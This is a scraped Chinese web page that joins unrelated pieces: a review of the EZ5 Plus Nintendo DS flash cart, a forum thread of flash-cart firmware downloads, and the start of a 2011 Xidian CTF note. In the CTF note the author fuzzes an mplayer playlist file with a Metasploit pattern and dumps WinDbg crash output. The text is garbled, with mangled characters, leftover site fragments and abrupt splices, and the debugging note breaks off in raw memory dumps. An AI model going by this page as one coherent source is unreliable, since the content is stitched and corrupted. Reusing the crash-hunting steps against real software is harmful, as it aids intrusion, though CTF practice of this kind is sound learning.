EZ5ez5烧录卡内核下载升级问题

www.51yue.net 2012-07-29 标签：centos 升级内核

清凉夏日 NDS烧录卡新秀EZ5PLUS详细评测 - CNET科技资讯网
中关村，被称为中国的硅谷，这里除了熙攘的电子卖场，...
剥皮寮是这此次「推荐Google街景三轮车拍摄景点」票选...
话说，某日，祝英台与梁山伯去逛街……
6月22日上午，在大连世界博览广场举办的第八届中国国际...
大部分公司在走向死亡。本文分析了微软之所以处于危险...
苹果发布的最新产品似乎并没有给苹果联合创始人之一的...
清凉夏日 NDS烧录卡新秀EZ5PLUS详细评测
13:55:25 关键词：
　　本文原载自CNGBA论坛,作者执行者＆小星:/thread--1.html
　　熟悉烧录的朋友都知道，支持大容量SDHC标准已经成为新生烧录卡的标配；
　　容量更大，速度更快的SDHC标准TF卡成为了存储新宠；
　　为此各大烧录厂商瞄准这一趋势都进行了更新换代与功能加强；
　　EZV Plus（以下简称EZ5P）正是这股潮流中的一浪。
　　之前没接触过EZ小组的产品，所以对其性能并不是很清楚；
　　也请大家和我一样将其作为一款新生力量看待，而不是单纯的新瓶旧酒。
　　外观/硬件篇
　　官方图：
　　自拍：
　　包装以黑色为主色调，EZFLASH V右下脚一个很明显的“PLUS”字样表明了他与EZV的不同；
　　包装上的文字不是很多，而且全是英文，看得出是为了外销的需要；
　　在四面都有“SDHC supported”的字样，看得出这是EZ5P的主要卖点；
　　正面的EZFLASH PLUS的LOGO和中间的卡标上面镀有塑料膜，在光照下有反射；
　　这些不仅是为了美观的需要，更重要的是为了打击假烧录市场，这也是EZ5P的防伪标志之一。
　　配件图：
　　包装内附带了如下附件
　　可伸缩金属笔
　　拇指笔
　　卡带保护盒
　　微型USB读卡器（支持MicroSDHC）
　　屏幕擦（官方没有写这个 OTL）
　　配件方面很齐全，都是些实用周边，可伸缩金属笔我很喜欢，手感特好；
　　但是拇指笔个人用起来感觉不是很习惯，不过应援团这样的游戏的发烧玩家，拇指笔还是很有必要的（笑）
　　注意卡带保护盒上的 EZFLASH 的 LOGO，这个LOGO也是有镀膜的，小山寨一般可是不会在意这些细节的哦；
　　屏幕擦，很实用的东东，居家旅行必备（笑）不过官方网站的附件说明中没提到这个小物件 OTL
　　卡带本体：
　　卡带做工很扎实，正版卡大小，摸在手上很有手感，背部采用磨沙设计；
　　我们可以看到EZ5P的插卡方式是侧插的，而且是采用直插的方式而不是现在流行的弹簧设计；
　　优点：防尘，防止TF卡意外弹出；
　　缺点：需要使用TF卡时取出稍麻烦，需要拔除卡带。
　　我在使用的时候感觉EZ5P的TF卡插的比较紧，这也是为了能更好的接触防止接触不良的设计。
　　我们可以看到金手指部分EZ5P没有像现在流行的烧录卡那样中间部分有小卡槽；
　　优点：利于清理金手指，防止氧化；
　　缺点：可能造成不能正常接触DS。（本条可无视）
　　正版卡大小，无突出。
　　不过我在使用的时候感觉EZ5P有些难弹出，这是因为它太肥的关系，不过影响不大，也正说明了它做工扎实。
　　卡我就不拆了，电路板和芯片等相关信息可以参考拆卡的朋友们的（笑）
　　特别提醒：EZ5P本体上面的LOGO贴纸千万不要随意撕下来，因为撕下来后...
　　介绍/评测
　　测试环境：
　　NDSL美版（已刷机）
　　EZ5P（内核1.84 正式版）
　　日产2G金士顿
　　本次Plus最大的改进还是在对TF卡的支持上，EZ5P采用了芯片级解决方案，配合EZ自主研发的混合模式，使得EZ5P在使用SDHC标准的大容量TF卡时，即使是CLASS 2或者更低速的TF卡也能打到很高的读取与运行速度，比起使用软件处理，EZ5P在这上面有更大的优势，使得EZ5P在运行游戏时不会产生拖慢和死机的现象。
　　科普小知识：
　　Class X 读写速率标准(最低读写速率 X MB/s)
　　一般分为三个级别Class 2、Class 4、Class 6
　　本次评测使用的是当前最新的1.84 正式版内核
　　与DSTT等烧录相同，将下载的内核接压
　　再将ez5sys.bin文件和moonshl文件夹拷入TF卡根目录
　　在moonshell对烧录卡成为密不可分的今天，EZ5P更是直接将其集成与内核中，方便快截的操作另人赞叹不已。
　　注意：2G或以下烧录卡请使用FAT磁盘格式，4G或以上（SDHC标准）请使用FAT32格式，因为FAT是不支持2G以上的磁盘的。
　　科普小知识：
　　根目录指逻辑驱动器的最上一级目录，它是相对子目录来说的。
　　举例：
　　比如“D:”、“E:”，这就是根目录。
　　打开我的电脑，点C盘就进入C盘的根目录。
　　扩展：
　　而“E:Games”，就是一个子目录。
　　内核拷贝完成后，只需将从网上下载来的 .nds .ids（神游）后缀的ROM文件拷贝到任意目录即可，免除了部分烧录卡只能识别根目录和不能识别二级目录的缺陷。
　　游戏的存档则生成在根目录下的S***E文件夹中，大小为512K，也就是4M存档向下兼容。
　　简评：在内核和游戏的***上EZ5P还是非常的方便的，捆绑moonshell的内核使得在应用上更加方便快捷。
　　小介绍：
　　这个是EZ5P捆绑的moonshell的插件列表
　　从这里可以看出，EZ5P是可以直接支持：aac bmp gif ikm jpegaccu mdx midrcp mikmodt0 mikmodt1 mikmodt2 mp3 msp nsf ogg png psd spc tta wav DPG DPG2格式的。
　　运行：
　　将拷贝好内核和ROM文件等的TF卡插入EZ5P中，再将EZ5P插入DS的SLOT-1插槽中，打开DS的电源即可。
　　EZ5P的运行方式与正版卡带相同，首先进入的是DS的欢迎界面，点一下后进入的是DS的设置界面，设置界面中有EZ5P的卡标
　　如果没装上TF卡或者没正确拷贝内核程序将出现如下界面
　　正确的***内核，进入EZ5P后将出现上下两屏的LOGO（抱歉，LOGO只是闪两秒，没截到图），之后则是个moonshell的载入过程，载入时间与moonshell相当。
　　进入内核可以看到上屏是文件列表，下屏是系统菜单和相关信息
　　当然，上屏你也可以选择小图标显示
　　常用图标说明：
　　图片文件
　　MP3音频文件
　　TXT电子书文件
　　S***存档文件
　　而ROM则是ROM自己的ICO文件
　　2436 - Riku to Johan: Kaeta Nimai no E - 里克与约翰 - JPN
　　我给它的命名是ind-riku_trim.nds
　　那么上屏就会给出它的ICO和命名信息，大小信息
　　而下屏则给出的是ICO和卡标饿信息，是否能开启震动
　　下屏图标说明：
　　背光调节（DS不可用）
　　软复位/金手指开关橙色为关，蓝色为开
　　帮助用于查看内核版本和热键说明
　　系统设置
　　这个作为重点介绍，点击系统设置的图标后。下屏将弹出如下设置选项
　　点击&&可更改语言，共有简体中文、繁体中文、英语、西班牙语、法语、德语、意大利语、日语、韩语等，我点了半天才找到简体中文OTL
　　震动级别是指SLOT-2接口插上了EZ 3合1拓展卡后调整震动的大小
　　小图标大图标则是上屏的ICO显示大小，刚才有演示过
　　CHT ARDS 则是EZ5P全球首创的AR+CHT双金手指引擎，可以保证您在第一时间享受到***的快感，这是EZ在增强产品功能与拓展的重大突破。
　　不过还是那句老话：适当金手指有益身心健康,过度使用破坏游戏平衡,请酌情使用!
　　软关机
　　热键/操作，系统界面下：
　　方向键：上屏的选择
　　A：确定/进入文件夹
　　B：取消/返回上级目录
　　X：删除文件
　　Y：拷贝文件
　　软复位/金手指
　　L+R+A+B：退回EZ5P主菜单
　　L+R+START：激活金手指
　　L+R+SELECT：关闭金手指
　　R+↑/↓：在金手指选择菜单浏览ARDS金手指时整页翻屏
　　以上热键都必须在系统的“软复位/金手指开关”开启的状态下才能使用。
　　游戏/自制软件兼容性测试
　　随意选择了些热门游戏
　　PS：我的DS的L键是坏的，所以像金手指，软复位等热键是无法测试的，实在是遗憾
　　自制软件
　　总评：
　　EZ5P的做工很扎实，也符合现在烧录卡易用易上手的特点；
　　双金手指的实现对于喜欢修改游戏的玩家无疑是一大福音；
　　SDHC标准的支持为玩家提供了更大更高速更稳定的游戏支持；
　　产品的细节方面突显人性化，合盖关闭背光，一段时间不操作关闭背光，下屏右上角的时钟等等；
　　对于假烧录横行，EZ5P也在仿伪上进行了改进；
　　不过这款产品也有着它的不足；
　　载入时间的出现无疑会另些玩家头痛，虽然一般游戏只需要4-6秒；
　　希望EZ小组能更加尽力的开发出更多新的功能，给玩家们惊喜。
独家 | 原创
07/14/2008
07/14/2008
07/14/2008
07/14/2008
07/10/2008
07/19/2012
07/12/2012
07/12/2012
05/31/2012
04/15/2012
02/17/2012
11/21/2011
11/07/2011
09/12/2012
09/04/2012
08/02/2012
07/24/2012
07/17/2012
07/04/2012
05/25/2012
05/09/2012| 　
| 　
| 　
| 　
| 　
只需一步，快速开始
查看: 41160|回复: 8
各烧录卡?核资源
主题帖子积分
新手玩家, 积分 10, 距离下一级还需 20 积分
新手玩家, 积分 10, 距离下一级还需 20 积分
本帖最后由 jqzy11 于
00:17 编辑
【楼层目录】
R4igoldplus
主题帖子积分
新手玩家, 积分 10, 距离下一级还需 20 积分
新手玩家, 积分 10, 距离下一级还需 20 积分
本帖最后由 3DM_Alice 于
15:46 编辑
TTDS烧录卡
p1.jpg (36.5 KB, 下载次数: 128)
22:50 上传
【内核下载】
【推荐使用内核】
5月3日更新，集成最新金手指???。
【自家用】
自家用的内核
?DSTT文件?的所有?西?到存?卡?就可以啦
WOOD1.25/YS
金手指日更新的工整版
???日更新版
MoonShell2.05
?：新手建????和存?挪出?後格式化卡? 再放?去不建?和自家?在用的混合?。老?就可以??啦
QFZ]@ML}`C(I96Q_~@9L)DG0.jpg (12.15 KB, 下载次数: 103)
23:01 上传
开机后载入后选择DS文件就能开始游戏啦测试目前游戏基本能运行金手指设置在DS文件上按Y后按X进入，想要使用YS就进入上图中的东西
Q_[SJ5T`@H1JSLQ]Y1UHIL90.jpg (12.35 KB, 下载次数: 206)
23:01 上传
进入到这个界面选择MoonShell或者YS 触摸屏选中后再戳一下(;? ?)ノ或者按A
QV`LVX8UM1YHE12OZ(BQKKG0.jpg (16.05 KB, 下载次数: 81)
23:01 上传
主题帖子积分
新手玩家, 积分 10, 距离下一级还需 20 积分
新手玩家, 积分 10, 距离下一级还需 20 积分
本帖最后由 jqzy11 于
23:19 编辑
bn-wsgw.jpg (47.84 KB, 下载次数: 119)
23:12 上传
【内核下载】
主题帖子积分
新手玩家, 积分 10, 距离下一级还需 20 积分
新手玩家, 积分 10, 距离下一级还需 20 积分
本帖最后由 jqzy11 于
23:31 编辑
banner_zh_cn.jpg (50.08 KB, 下载次数: 313)
23:26 上传
【内核下载】
主题帖子积分
新手玩家, 积分 10, 距离下一级还需 20 积分
新手玩家, 积分 10, 距离下一级还需 20 积分
本帖最后由 jqzy11 于
23:41 编辑
ez5i-simple.jpg (66.75 KB, 下载次数: 554)
23:38 上传
【内核下载】
主题帖子积分
新手玩家, 积分 10, 距离下一级还需 20 积分
新手玩家, 积分 10, 距离下一级还需 20 积分
本帖最后由 jqzy11 于
23:51 编辑
QQ截图13.jpg (33.03 KB, 下载次数: 62)
23:48 上传
【内核下载】
主题帖子积分
新手玩家, 积分 10, 距离下一级还需 20 积分
新手玩家, 积分 10, 距离下一级还需 20 积分
本帖最后由 jqzy11 于
23:23 编辑
2.jpg (42.41 KB, 下载次数: 48)
23:54 上传
【内核下载】
主题帖子积分
新手玩家, 积分 10, 距离下一级还需 20 积分
新手玩家, 积分 10, 距离下一级还需 20 积分
本帖最后由 jqzy11 于
00:07 编辑
QQ截图48.jpg (57.4 KB, 下载次数: 120)
00:04 上传
【内核下载】
☆☆SDHC-DSONE/i Eos V1.0 SP6系统下载☆☆
☆☆DSONE Eos系统下载☆☆
主题帖子积分
新手玩家, 积分 10, 距离下一级还需 20 积分
新手玩家, 积分 10, 距离下一级还需 20 积分
本帖最后由 jqzy11 于
16:39 编辑
R4igoldplus
Header.jpg (87.63 KB, 下载次数: 139)
00:11 上传
【内核下载】
Powered by2011西电网络攻防大赛漏洞挖掘题目调试笔记
睡觉被雷声震醒了，干脆起来玩玩。
2011年的溢出题目第二题目居然坑爹的绑定在127.0.0.1的地址，这是本地溢出呢还是远程溢出，出题者这是要闹那样。先不看这个了先玩玩那个漏洞挖掘题目。
压缩包里是一个mplayer的播放器，题目说明如下：
***这个有漏洞的软件
1.观察软件漏洞出现的原因
2.试图利用软件漏洞完成一个poc
3.要求在win7下关闭UAC完成攻击，绕过DEP（要求在演示exploit之前先展示DEP的开启)
4.要求利用SEH进行漏洞利用
提交***时，提交屏幕录像和说明文档，其中说明文档占15分，录像15分。
漏洞要自己挖掘，播放器很多出问题的地方在皮肤啊m3u文件啊等等，先生成一个超长字符串的畸形文件fuzz一下。
root@kali:~/Desktop#
/opt/metloit/apps/pro/msf3/tools/pattern_create.rb 5000 & ~/Desktop/5k.m3u
ModLoad: 1d000
C:\WINDOWS\system32\IMM32.DLL
ModLoad: 62c00
C:\WINDOWS\system32\LPK.DLL
ModLoad: 73fa0
C:\WINDOWS\system32\USP10.dll
ModLoad: 35000
C:\Documents and Settings\Administrator\桌面\xdcsc2011\xdcsc2011\漏洞挖掘\mplayer\mplayer_release\mplayer\unrar.dll
ModLoad: cb000
C:\WINDOWS\system32\MSCTF.dll
ModLoad: 77bd00
C:\WINDOWS\system32\version.dll
ModLoad: 6e000
C:\WINDOWS\system32\msctfime.ime
ModLoad: 5adc0000 5adf7000
C:\WINDOWS\system32\uxtheme.dll
ModLoad: 5adc0000 5adf7000
C:\WINDOWS\system32\UxTheme.dll
(89c.80): Access violation & code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax= ebx=0022eab4 ecx=ffffffff edx= esi=7ffddbf8 edi=
eip=7c921278 esp=0022e6ac ebp= iopl=0
nv up ei pl zr na pe nc
ntdll!RtlInitAnsiString+0x1b:
repne scas byte ptr es:[edi]
0:000& !exchain
0022ffe0: *** ERROR: Symbol file could not be found.
Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!ValidateLocale+2b0 (7c839af0)
Invalid exception stack at ffffffff
0:000& d fs:[0]
e0 ff 22 00 00 00 23 00-00 a0 22 00 00 00 00 00 ..&&#&&&..
003b: 1e 00 00 00 00 00 00-00 d0 fd 7f 00 00 00 00 &&&&&.
003b:c 08 00 00 80 00 00 00-00 00 00 00 88 2c 25 00 &&&&.,%.
003b: e0 fd 7f 06 00 00 00-00 00 00 00 00 00 00 00 &&&&&.
003b: 64 55 e2 00 00 00 00-00 00 00 00 00 00 00 00 .dU&&&&.
003b: 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 &&&&&.
003b: 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 &&&&&.
003b: 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 &&&&&.
0:000& d 0022ffe0
ff ff ff ff f0 9a 83 7c-f0 6f 81 7c 00 00 00 00
&&.|.o.|&.
00 00 00 00 00 00 00 00-40 11 40 00 00 00 00 00
&&..@.@&..
63 74 78 20 00 00 00-01 00 00 00 b8 24 00 00
Actx &&..$..
c4 00 00 00 00 00 00 00-20 00 00 00 00 00 00 00
00 00 00 01 00 00 00-06 00 00 00 34 00 00 00
01 00 00 01 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00-00 00 00 00 02 00 00 00
00 00 00 00 00 00 00-00 00 00 00 14 02 00 00
ChildEBP RetAddr
Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
7c861 0022ecbc
ntdll!RtlInitAnsiString+0x1b
*** ERROR: Module load completed but symbols could not be loaded for image
61 2eb88 kernel32!FindFirstFileA+0&21
c9461dc 003e52a0 7c96b1be 003e5338 image&161818
c98e57f 003e0 003e52a0 ntdll!iswdigit+0x2bf
0022eaa8 7c98f888 003e1
ntdll!RtlpNtMakeTemporaryKey+0x6bdb
61 46138 ntdll!RtlpNtMakeTemporaryKey+0x7ee4
&Unloaded_eme.dll&+0&
65 46561 &Unloaded_eme.dll&+0&
65 86561 &Unloaded_eme.dll&+0&
65 26661 &Unloaded_eme.dll&+0&
&Unloaded_eme.dll&+0x3166612f
(89c.80): Access violation & code c0000005 (!!! second chance !!!)
eax= ebx=0022eab4 ecx=ffffffff edx= esi=7ffddbf8 edi=
eip=7c921278 esp=0022e6ac ebp= iopl=0
nv up ei pl zr na pe nc
ntdll!RtlInitAnsiString+0x1b:
repne scas byte ptr es:[edi]
0:000& !exchain
0022ffe0: kernel32!ValidateLocale+2b0 (7c839af0)
Invalid exception stack at ffffffff
程序界面已经退出，windbg捕获到程序触发了异常，并进入异常处理流程，可以看到esp附近的指向的内存区域已被我们的特殊字符串覆盖了，栈中的异常处理结构 0022ffe0 并没有被覆盖，我们看一下
0:000& d esp
74 e9 22 00 a5 e0 80 7c-c0 e6 22 00 61 31 42 61
t.&&.|..&.a1Ba
03 00 00 00 00 00 00 00-61 31 42 61 48 e9 22 00
&&..a1BaH.&.
0a 38 81 7c 61 31 42 61-bc ec 22 00 03 00 00 00
.8.|a1Ba..&&..
f2 4f 83 7c 00 00 00 00-6a 00 36 00 41 00 6a 00
.O.|&.j.6.A.j.
37 00 41 00 6a 00 38 00-41 00 6a 00 39 00 41 00
7.A.j.8.A.j.9.A.
6b 00 30 00 41 00 6b 00-00 00 00 00 00 00 00 00
k.0.A.k&&&
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 25 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
c0 e6 22 00 00 00 00 00-54 e8 22 00 20 e9 92 7c
..&&..T.&. ..|
60 62 94 7c ff ff ff ff-56 62 94 7c 45 60 94 7c
`b.|&.Vb.|E`.|
00 00 25 00 60 00 00 40-5d 00 93 7c c0 00 00 00
..%.`..@]..|&.
03 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 25 00 00 00 00 00-00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00-c0 28 25 00 a8 e8 22 00
22 00 fb 7f 01 00 00 00-80 e8 22 00 04 a2 80 7c
c0 28 25 00 a8 e8 22 00-aa e8 22 00 34 e9 22 00
.(%&&&&.4.&.
37 e9 22 00 00 00 00 00-00 00 00 00 01 00 00 00
01 00 00 00 00 e9 22 00-4b 49 c0 77 a8 03 00 00
&&&.KI.w&.
00 00 00 00 a8 e8 22 00-00 00 00 00 34 e9 22 00
&&&&..4.&.
03 00 00 00 01 00 00 00-00 00 00 00 73 00 c0 77
e0 4a c0 77 01 00 00 00-98 61 3e 00 53 00 00 00
.J.w&..a&.S&
dc e8 22 00 42 00 00 00-00 00 00 00 00 00 00 00
..&.B&&&..
00 00 00 00 01 00 00 00-01 00 00 00 20 e9 92 7c
c8 00 1a 02 a8 e8 22 00-ac e8 22 00 a8 e8 22 00
f8 db fd 7f e0 ff 22 00-bc ec 22 00 ff ff ff ff
48 e9 22 00 9a 58 83 7c-77 ee 80 7c bc ec 22 00
H.&..X.|w..|..&.
03 00 00 00 b4 ea 22 00-38 e9 22 00 3a c9 be 77
&&&.8.&.:..w
98 61 3e 00 3e 00 00 00-01 00 00 00 bc ec 22 00
.a&.&&&&&.
02 00 00 00 08 e9 22 00-02 00 00 00 e0 ff 22 00
f0 9a 83 7c 80 ee 80 7c-66 ec 00 00 03 00 00 00
18 18 56 00 61 31 42 61-74 e9 22 00 88 eb 22 00
..V.a1Bat.&&&.
20 e9 92 7c 40 f0 98 7c-ff ff ff ff c8 ed 22 00
..|@..|&&&.
b4 ea 22 00 90 ab 3e 00-70 14 00 00 ee fe ee fe
..&&&.p&&.
00 00 3e 00 a8 97 3e 00-00 00 00 00 74 ea 22 00
..&&&&..t.&.
00 00 00 00 74 ea 22 00-dc 61 94 7c a0 52 3e 00
&.t.&..a.|.R&.
be b1 96 7c 38 53 3e 00-b8 07 00 00 ee fe ee fe
00 00 3e 00 a0 52 3e 00-00 00 00 00 a4 ea 22 00
..&..R&&&.&.
00 00 00 00 a4 ea 22 00-dc 61 94 7c 00 00 3e 00
&&&..a.|..&.
56 62 94 7c a0 52 3e 00-00 00 3e 00 a8 52 3e 00
Vb.|.R&&&..R&.
00 00 00 00 d0 6d 3e 00-00 00 00 00 d4 ea 22 00
&..m&&&.&.
00 00 00 00 a8 52 3e 00-dc 61 94 7c 00 00 3e 00
&..R&..a.|..&.
48 b7 2c 09 d0 6d 3e 00-a8 97 3e 00 10 41 2a 09
H.,..m&&&..A*.
78 01 3e 00 f0 3a 29 09-01 00 00 00 78 01 3e 00
x.&..:)&..x.&.
00 00 00 00 d8 6d 3e 00-ff ff ff ff 20 00 00 00
&..m&&.. &
78 01 3e 00 f8 3a 29 09-a0 52 3e 00 88 00 00 00
x.&..:)..R&&..
18 41 2a 09 56 62 94 7c-01 00 00 00 18 41 2a 09
.A*.Vb.|&..A*.
00 00 3e 00 00 00 00 00-a8 97 3e 00 00 00 3e 00
..&&&.&&&.
00 00 00 00 74 ea 22 00-d8 ea 22 00 20 e9 92 7c
&.t.&&&. ..|
00 00 3e 00 56 62 94 7c-a8 ea 22 00 7f e5 98 7c
..&.Vb.|..&&.|
00 00 3e 00 00 00 00 00-a0 52 3e 00 00 00 3e 00
..&&&R&&&.
a8 52 3e 00 a4 ea 22 00-08 eb 22 00 20 e9 92 7c
.R&&&&&. ..|
00 00 00 00 00 00 3e 00-00 00 00 00 18 eb 22 00
88 f8 98 7c 08 06 3e 00-61 61 30 61 61 31 61 61
&|..&.aa0aa1aa
32 61 61 33 61 61 34 61-61 35 61 61 36 61 61 37
2aa3aa4aa5aa6aa7
61 61 38 61 61 39 61 62-30 61 62 31 61 62 32 61
aa8aa9ab0ab1ab2a
62 33 61 62 34 61 62 35-61 62 36 61 62 37 61 62
b3ab4ab5ab6ab7ab
38 61 62 39 61 63 30 61-63 31 61 63 32 61 63 33
8ab9ac0ac1ac2ac3
61 63 34 61 63 35 61 63-36 61 63 37 61 63 38 61
ac4ac5ac6ac7ac8a
63 39 61 64 30 61 64 31-61 64 32 61 64 33 61 64
c9ad0ad1ad2ad3ad
34 61 64 35 61 64 36 61-64 37 61 64 38 61 64 39
4ad5ad6ad7ad8ad9
61 65 30 61 65 31 61 65-32 61 65 33 61 65 34 61
ae0ae1ae2ae3ae4a
65 35 61 65 36 61 65 37-61 65 38 61 65 39 61 66
e5ae6ae7ae8ae9af
30 61 66 31 61 66 32 61-66 33 61 66 34 61 66 35
0af1af2af3af4af5
61 66 36 61 66 37 61 66-38 61 66 39 61 67 30 61
af6af7af8af9ag0a
67 31 61 67 32 61 67 33-61 67 34 61 67 35 61 67
g1ag2ag3ag4ag5ag
36 61 67 37 61 67 38 61-67 39 61 68 30 61 68 31
6ag7ag8ag9ah0ah1
61 68 32 61 68 33 61 68-34 61 68 35 61 68 36 61
ah2ah3ah4ah5ah6a
68 37 61 68 38 61 68 39-61 69 30 61 69 31 61 69
h7ah8ah9ai0ai1ai
32 61 69 33 61 69 34 61-69 35 61 69 36 61 69 37
2ai3ai4ai5ai6ai7
61 69 38 61 69 39 61 6a-30 61 6a 31 61 6a 32 61
ai8ai9aj0aj1aj2a
6a 33 61 6a 34 61 6a 35-61 6a 36 61 6a 37 61 6a
j3aj4aj5aj6aj7aj
38 61 6a 39 61 6b 30 61-6b 00 41 6b 32 41 6b 33
8aj9ak0ak.Ak2Ak3
41 6b 34 41 6b 35 41 6b-36 41 6b 37 41 6b 38 41
Ak4Ak5Ak6Ak7Ak8A
6b 39 41 6c 30 41 6c 31-41 6c 32 41 6c 33 41 6c
k9Al0Al1Al2Al3Al
34 41 6c 35 41 6c 36 41-6c 37 41 6c 38 41 6c 39
4Al5Al6Al7Al8Al9
41 6d 30 41 6d 31 41 6d-32 41 6d 33 41 6d 34 41
Am0Am1Am2Am3Am4A
6d 35 41 6d 36 41 6d 37-41 6d 38 41 6d 39 41 6e
m5Am6Am7Am8Am9An
30 41 6e 31 41 6e 32 41-6e 33 41 6e 34 41 6e 35
0An1An2An3An4An5
41 6e 36 41 6e 37 41 6e-38 41 6e 39 41 6f 30 41
An6An7An8An9Ao0A
6f 31 41 6f 32 41 6f 33-41 6f 34 41 6f 35 41 6f
o1Ao2Ao3Ao4Ao5Ao
36 41 6f 37 41 6f 38 41-6f 39 41 70 30 41 70 31
6Ao7Ao8Ao9Ap0Ap1
41 70 32 41 70 33 41 70-34 41 70 35 41 70 36 41
Ap2Ap3Ap4Ap5Ap6A
70 37 41 70 38 41 70 39-41 71 30 41 71 31 41 71
p7Ap8Ap9Aq0Aq1Aq
32 41 71 33 41 71 34 41-71 35 41 71 36 41 71 37
2Aq3Aq4Aq5Aq6Aq7
41 71 38 41 71 39 41 72-30 41 72 31 41 72 32 41
Aq8Aq9Ar0Ar1Ar2A
38 73 3e 00 34 41 72 35-41 72 36 41 72 37 41 72
8s&.4Ar5Ar6Ar7Ar
38 41 72 39 41 73 30 41-73 31 41 73 32 41 73 33
8Ar9As0As1As2As3
41 73 34 41 73 35 41 73-36 41 73 37 41 73 38 41
As4As5As6As7As8A
73 39 41 74 30 41 74 31-41 74 32 41 74 33 41 74
s9At0At1At2At3At
34 41 74 35 41 74 36 41-74 37 41 74 38 41 74 39
4At5At6At7At8At9
41 75 30 41 75 31 41 75-32 41 75 33 41 75 34 41
Au0Au1Au2Au3Au4A
75 35 41 75 36 41 75 37-41 75 38 41 75 39 41 76
u5Au6Au7Au8Au9Av
30 41 76 31 41 76 32 41-76 33 41 76 34 41 76 35
0Av1Av2Av3Av4Av5
41 76 36 41 76 37 41 76-38 41 76 39 41 77 30 41
Av6Av7Av8Av9Aw0A
77 31 41 77 32 41 77 33-41 77 34 41 77 35 41 77
w1Aw2Aw3Aw4Aw5Aw
36 41 77 37 41 77 38 41-77 39 41 78 30 41 78 31
6Aw7Aw8Aw9Ax0Ax1
41 78 32 41 78 33 41 78-34 41 78 35 41 78 36 41
Ax2Ax3Ax4Ax5Ax6A
78 37 41 78 38 41 78 39-41 79 30 41 79 31 41 79
x7Ax8Ax9Ay0Ay1Ay
32 41 79 33 41 79 34 41-79 35 41 79 36 41 79 37
2Ay3Ay4Ay5Ay6Ay7
41 79 38 41 79 39 41 7a-30 41 7a 31 41 7a 32 41
Ay8Ay9Az0Az1Az2A
7a 33 41 7a 34 41 7a 35-41 7a 36 41 7a 37 41 7a
z3Az4Az5Az6Az7Az
38 41 7a 39 42 61 30 42-61 31 42 61 32 42 61 33
8Az9Ba0Ba1Ba2Ba3
42 61 34 42 61 35 42 61-36 42 61 37 42 61 38 42
Ba4Ba5Ba6Ba7Ba8B
61 39 42 62 30 42 62 31-42 62 32 42 62 33 42 62
a9Bb0Bb1Bb2Bb3Bb
34 42 62 35 42 62 36 42-62 37 42 62 38 42 62 39
4Bb5Bb6Bb7Bb8Bb9
42 63 30 42 63 31 42 63-32 42 63 33 42 63 34 42
Bc0Bc1Bc2Bc3Bc4B
63 35 42 63 36 42 63 37-42 63 38 42 63 39 42 64
c5Bc6Bc7Bc8Bc9Bd
30 42 64 31 42 64 32 42-64 33 42 64 34 42 64 35
0Bd1Bd2Bd3Bd4Bd5
42 64 36 42 64 37 42 64-38 42 64 39 42 65 30 42
Bd6Bd7Bd8Bd9Be0B
65 31 42 65 32 42 65 33-42 65 34 42 65 35 42 65
e1Be2Be3Be4Be5Be
36 42 65 37 42 65 38 42-65 39 42 66 30 42 66 31
6Be7Be8Be9Bf0Bf1
42 66 32 42 66 33 42 66-34 42 66 35 42 66 36 42
Bf2Bf3Bf4Bf5Bf6B
66 37 42 66 38 42 66 39-42 67 30 42 67 31 42 67
f7Bf8Bf9Bg0Bg1Bg
32 42 67 33 42 67 34 42-67 35 42 67 36 42 67 37
2Bg3Bg4Bg5Bg6Bg7
42 67 38 42 67 39 42 68-30 42 68 31 42 68 32 42
Bg8Bg9Bh0Bh1Bh2B
68 33 42 68 34 42 68 35-42 68 36 42 68 37 42 68
h3Bh4Bh5Bh6Bh7Bh
38 42 68 39 42 69 30 42-69 31 42 69 32 42 69 33
8Bh9Bi0Bi1Bi2Bi3
42 69 34 42 69 35 42 69-36 42 69 37 42 69 38 42
Bi4Bi5Bi6Bi7Bi8B
69 39 42 6a 30 42 6a 31-42 6a 32 42 6a 33 42 6a
i9Bj0Bj1Bj2Bj3Bj
34 42 6a 35 42 6a 36 42-6a 37 42 6a 38 42 6a 39
4Bj5Bj6Bj7Bj8Bj9
42 6b 30 42 6b 31 42 6b-32 42 6b 33 42 6b 34 42
Bk0Bk1Bk2Bk3Bk4B
6b 35 42 6b 36 42 6b 37-42 6b 38 42 6b 39 42 6c
k5Bk6Bk7Bk8Bk9Bl
30 42 6c 31 42 6c 32 42-6c 33 42 6c 34 42 6c 35
0Bl1Bl2Bl3Bl4Bl5
42 6c 36 42 6c 37 42 6c-38 42 6c 39 42 6d 30 42
Bl6Bl7Bl8Bl9Bm0B
6d 31 42 6d 32 42 6d 33-42 6d 34 42 6d 35 42 6d
m1Bm2Bm3Bm4Bm5Bm
36 42 6d 37 42 6d 38 42-6d 39 42 6e 30 42 6e 31
6Bm7Bm8Bm9Bn0Bn1
42 6e 32 42 6e 33 42 6e-34 42 6e 35 42 6e 36 42
Bn2Bn3Bn4Bn5Bn6B
6e 37 42 6e 38 42 6e 39-42 6f 30 42 6f 31 42 6f
n7Bn8Bn9Bo0Bo1Bo
32 42 6f 33 42 6f 34 42-6f 35 42 6f 36 42 6f 37
2Bo3Bo4Bo5Bo6Bo7
42 6f 38 42 6f 39 42 70-30 42 70 31 42 70 32 42
